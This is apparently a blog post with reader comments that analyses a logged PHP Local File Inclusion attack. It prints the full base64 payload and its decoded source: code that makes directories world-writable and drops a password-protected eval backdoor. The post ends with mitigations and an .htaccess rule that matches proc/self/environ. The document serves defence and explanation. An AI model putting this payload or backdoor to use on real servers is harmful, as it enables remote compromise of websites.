Symptom: Web server logs show entries similar to “GET /index.php?inc=../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0” 200 22702 “” ” ##php eval(base64_decode(\”YWRkTG9hZGVyKCk7DQokZGF0YSA9IEBvcGVuZGlyKCcuJyk7DQoNCndoaWxlICgkZmlsZSA9IEByZWFkZGlyKCRkYXRhKSkNCnsNCgkkZmlsZSA9IHRyaW0oJGZpbGUpOw0KCWlmICghJGZpbGUgfHwgcHJlZ19tYXRjaCgnL15cLiskLycsICRmaWxlKSB8fCAhaXNfZGlyKCRmaWxlKSkgY29udGludWU7DQoJYWRkTG9hZGVyKCRmaWxlKTsNCn0NCg0KQGNsb3NlZGlyKCRkYXRhKTsNCg0KZnVuY3Rpb24gYWRkTG9hZGVyKCRkaXIgPSAnJykNCnsNCiAgICBpZiAoJGRpcikgJGRpciAuPSAnLyc7DQogICAgQGNobW9kKCRkaXIsIDc3Nyk7DQogICAgDQogICAgJGZwID0gZm9wZW4oInskZGlyfWVkNjllZDYwYmU0ODViYTFkY2QwMDc3MzRiODM2Y2E4LnBocCIsICJ3Iik7IA0KICAgIGZ3cml0ZSgkZnAsIGJhc2U2NF9kZWNvZGUoJ1BEOXdhSEFOQ2cwS1FHbHVhVjl6WlhRb0oyRnNiRzkzWDNWeWJGOW1iM0JsYmljc0lERXBPdzBLUUdsdWFWOXpaWFFvSjJSbFptRjFiSFJmYzI5amEyVjBYM1JwYldWdmRYUW5MQ0EyTUNrN0RRcEFhVzVwWDNObGRDZ25iV0Y0WDJWNFpXTjFkR2x2Ymw5MGFXMWxKeXdnTmpBcE93MEtRSE5sZEY5MGFXMWxYMnhwYldsMEtEWXdLVHNOQ2cwS0pHUmhkR0VnUFNCQWRXNXpaWEpwWVd4cGVtVW9ZbUZ6WlRZMFgyUmxZMjlrWlNoMGNtbHRLRUFrWDFCUFUxUmJKMlJoZEdFblhTa3BLVHNOQ2cwS2FXWWdLRUFoYVhOZllYSnlZWGtvSkdSaGRHRXBJSHg4SUcxa05TZ2taR0YwWVZzbmNHRnpjM2R2Y21RblhTa2dJVDBnSjJRelpHWTBNemxqTTJVMFlqSmpOREU1TWpCa09HVXlOek16TVRFek1qTTJKeWtnWlhocGREc05DbWxtSUNoQUpHUmhkR0ZiSjJOdlpHVW5YU2tnWlhaaGJDaGlZWE5sTmpSZlpHVmpiMlJsS0NSa1lYUmhXeWRqYjJSbEoxMHBLVHNOQ21sbUlDaEFKR1JoZEdGYkoyTm9aV05yWDJOdlpHVW5YU2tnY0hKcGJuUWdKR1JoZEdGYkoyTm9aV05yWDJOdlpHVW5YVHNOQ2cwS1B6ND0nKSk7DQoJZmNsb3NlKCRmcCk7DQoNCglpZiAoZmlsZV9leGlzdHMoInskZGlyfWVkNjllZDYwYmU0ODViYTFkY2QwMDc3MzRiODM2Y2E4LnBocCIpKQ0KCXsNCiAgICAgICAgJGNrID0gIjE4MjM2NDkzNjU4MjAzNTQiOw0KCSAgICBwcmludCAiJGNrOnsqfTokZGlyOnsqfToiOw0KCQlleGl0Ow0KCX0NCn0=\”)); ##”
Please note that the <? and > were removed for security reasons and replaced with ##
Description: This is a poisoned null byte hacking attack, often conducted by bot’s. If the postfix null bytes are not handled correctly it can lead to an exploit in the system, this technique is called Local File Inclusion. In addition to the Local File Inclusion (LFI), this version is attempting to execute code by running a php statement that is encoded with Base 64.
If this attack is successful, it will result in the inclusion of the /proc/self/environ file or other requested file, instead of the originally requested file (index.php) in this case, in addition, the php script if run, will append its code to the original file and create a new file that will notify the hacker of success.
Lets delve a bit deeper here… Anything prefixed with ## is a comment I inserted into the code. The Base 64 code within the Eval Statements translates to…:
addLoader();
$data = @opendir(‘.’); ## We have data!!
while ($file = @readdir($data)) ## While we are reading the data… lets work on this…
{
$file = trim($file);
if (!$file || preg_match(‘/^\.+$/’, $file) || !is_dir($file)) continue; ## If there is no file, or if it matches, or there is no directory for the file… load another file…
addLoader($file);
}
@closedir($data);
function addLoader($dir = ”)
{
if ($dir) $dir .= ‘/’; ##Try to set the root directory
@chmod($dir, 777); ## Set it to 777 which provides access to everything
$fp = fopen(“{$dir}ed69ed60be485ba1dcd007734b836ca8.php”, “w”); ##Lets create the following file and write the contents too it.
fwrite($fp, base64_decode(‘PD9waHANCg0KQGluaV9zZXQoJ2FsbG93X3VybF9mb3BlbicsIDEpOw0KQGluaV9zZXQoJ2RlZmF1bHRfc29ja2V0X3RpbWVvdXQnLCA2MCk7DQpAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywgNjApOw0KQHNldF90aW1lX2xpbWl0KDYwKTsNCg0KJGRhdGEgPSBAdW5zZXJpYWxpemUoYmFzZTY0X2RlY29kZSh0cmltKEAkX1BPU1RbJ2RhdGEnXSkpKTsNCg0KaWYgKEAhaXNfYXJyYXkoJGRhdGEpIHx8IG1kNSgkZGF0YVsncGFzc3dvcmQnXSkgIT0gJ2QzZGY0MzljM2U0YjJjNDE5MjBkOGUyNzMzMTEzMjM2JykgZXhpdDsNCmlmIChAJGRhdGFbJ2NvZGUnXSkgZXZhbChiYXNlNjRfZGVjb2RlKCRkYXRhWydjb2RlJ10pKTsNCmlmIChAJGRhdGFbJ2NoZWNrX2NvZGUnXSkgcHJpbnQgJGRhdGFbJ2NoZWNrX2NvZGUnXTsNCg0KPz4=’));
fclose($fp); ##again… we are encoded in base 64
if (file_exists(“{$dir}ed69ed60be485ba1dcd007734b836ca8.php”))
{
$ck = “1823649365820354”;
print “$ck:{*}:$dir:{*}:”;
exit;
}
}
##Here is our decoded Base 64
##php
@ini_set(‘allow_url_fopen’, 1); ##Lets override the standard PHP File
@ini_set(‘default_socket_timeout’, 60); ##Now we have opened a socket
@ini_set(‘max_execution_time’, 60);
@set_time_limit(60);
$data = @unserialize(base64_decode(trim(@$_POST[‘data’])));
if (@!is_array($data) || md5($data[‘password’]) != ‘d3df439c3e4b2c41920d8e2733113236’) exit;
if (@$data[‘code’]) eval(base64_decode($data[‘code’])); ##If there’s data, lets check it out
if (@$data[‘check_code’]) print $data[‘check_code’];
##
Summary: If successful, this exploit will bypass your PHP settings, set one of your directory’s to world access, and write a file with the above name .php and provide a backdoor to your server.
Solutions:
1. Consider using mod_security add on for Linux/Unix Servers
2. Use .htaccess files to prevent this kind of exploit
3. Use a firewall program to prevent unwanted access
4. STAY UP TO DATE.
I have a few dozen of these in my logs from what appears to be a compromised webhost. The MD5’d password is identical to the one shown in your sample which indicates it could be set at a default or is in fact the same individual. In my case the attacker appears to be explicitly targeting Joomla! sites as the URLs in the initial GET request are formatted in Joomla! specific ways.
Josh,
Be sure you have this statement in your .htaccess file, if you already do you are in great shape:
#### @RS if the request contains /proc/self/environ
RewriteCond %{QUERY_STRING} proc\/self\/environ [OR]
#### @RS
I would recommend starting here http://docs.joomla.org/Htaccess_examples_%28security%29
You also probably want to ensure the /administrator/ path has an .htaccess file that stricts it to only your IP address like the following:
# Administrative Block
order deny,allow
deny from all
allow from 123.56.789.0 (Your IP Address)
Just remember if its a dynamic IP, you will need to update the .htaccess file every time your IP address updates.
I just received such kind of hacking attempt, which obviously failed. Good thing I have edited my .htaccess and improved my security to the maximum level just a few hours before the hacking attempt occur. If not, maybe I’m doomed today. 🙂